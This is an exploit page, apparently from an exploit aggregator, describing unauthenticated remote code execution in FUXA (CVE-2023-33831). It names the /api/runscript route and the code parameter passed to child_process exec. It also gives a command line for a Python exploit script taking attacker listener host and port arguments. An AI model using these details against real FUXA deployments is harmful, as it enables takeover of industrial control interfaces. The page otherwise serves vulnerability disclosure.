Share
## https://sploitus.com/exploit?id=4051AA8A-DFB4-54B9-84AD-88ED8D9ED1A5
# Unauthenticated-RCE-FUXA-CVE-2023-33831
The vulnerability affects FUXA's scripting component, due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods that can be scaled for remote code execution.
The affected route is /api/runscript, where it is possible to execute commands without having to be authenticated through the code parameter via the POST method using the child_process module via the exec function.

<p align="center">
  <img height=300 src="https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831/assets/54555784/07c1b06a-737d-4842-b47b-abdebffa3b5b" />
</p>

---

#### Mode of Use
```
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>
```
Link: https://www.youtube.com/watch?v=Xxa6yRB2Fpw